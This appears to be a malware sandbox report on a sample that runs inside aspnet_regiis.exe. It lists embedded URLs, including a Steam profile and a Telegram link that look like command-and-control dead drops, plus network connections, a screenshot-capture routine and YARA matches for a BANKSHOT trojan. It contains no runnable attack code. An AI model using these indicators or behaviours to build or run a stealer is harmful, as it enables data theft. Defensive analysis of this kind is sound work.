Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869x
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/s
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: HDGCFH.3.dr	String found in binary or memory: https://support.mozilla.org
Source: HDGCFH.3.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HDGCFH.3.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
Source: file.exe, 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: HDGCFH.3.dr	String found in binary or memory: https://www.mozilla.org
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2658632872.000000001B92C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: HDGCFH.3.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2658632872.000000001B92C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/FBFIEBGHJE
Source: HDGCFH.3.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2658632872.000000001B92C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: aspnet_regiis.exe, 00000003.00000003.1983803798.0000000022283000.00000004.00000020.00020000.00000000.sdmp, HDGCFH.3.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: HDGCFH.3.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: aspnet_regiis.exe, 00000003.00000003.1983803798.0000000022283000.00000004.00000020.00020000.00000000.sdmp, HDGCFH.3.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2658632872.000000001B92C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: aspnet_regiis.exe, 00000003.00000003.1983803798.0000000022283000.00000004.00000020.00020000.00000000.sdmp, HDGCFH.3.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.9:49712 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02A11F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

3_2_02A11F55

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.aspnet_regiis.exe.2a3f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 3.2.aspnet_regiis.exe.2a3dcd8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth

PE file has nameless sections

Source: file.exe

Static PE information: section name:

Contains functionality to call native functions

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5BA4E0 GetModuleHandleW,NtQueryInformationProcess,	0_2_6D5BA4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0145B GetCurrentProcess,NtQueryInformationProcess,	3_2_02A0145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CACB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6CACB700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CACB8C0 rand_s,NtQueryVirtualMemory,	3_2_6CACB8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CACB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	3_2_6CACB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA6F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6CA6F280

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5B80E0	0_2_6D5B80E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5BA4E0	0_2_6D5BA4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5BABD0	0_2_6D5BABD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5D9D15	0_2_6D5D9D15
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5B4510	0_2_6D5B4510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C8110	0_2_6D5C8110
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C7110	0_2_6D5C7110
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5B5D00	0_2_6D5B5D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5CC900	0_2_6D5CC900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5BA9F0	0_2_6D5BA9F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C4D90	0_2_6D5C4D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C3D80	0_2_6D5C3D80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C7850	0_2_6D5C7850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C5C50	0_2_6D5C5C50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C3870	0_2_6D5C3870
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C5060	0_2_6D5C5060
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C4060	0_2_6D5C4060
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C2C00	0_2_6D5C2C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5CA030	0_2_6D5CA030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C7C20	0_2_6D5C7C20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C28D0	0_2_6D5C28D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5B4CF0	0_2_6D5B4CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C68F0	0_2_6D5C68F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5B98E0	0_2_6D5B98E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C8C80	0_2_6D5C8C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C5F50	0_2_6D5C5F50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5B2B70	0_2_6D5B2B70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5B3370	0_2_6D5B3370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C6B60	0_2_6D5C6B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C4360	0_2_6D5C4360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C4B00	0_2_6D5C4B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C3330	0_2_6D5C3330
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C2FC0	0_2_6D5C2FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5B3FE0	0_2_6D5B3FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C9790	0_2_6D5C9790
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C53B0	0_2_6D5C53B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C87A0	0_2_6D5C87A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5CC250	0_2_6D5CC250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5B5A40	0_2_6D5B5A40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5CC620	0_2_6D5CC620
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C7EC0	0_2_6D5C7EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C22C0	0_2_6D5C22C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1C472	3_2_02A1C472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A2D1C3	3_2_02A2D1C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A2D933	3_2_02A2D933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1B712	3_2_02A1B712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A2CD2E	3_2_02A2CD2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1950A	3_2_02A1950A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A2DD1B	3_2_02A2DD1B
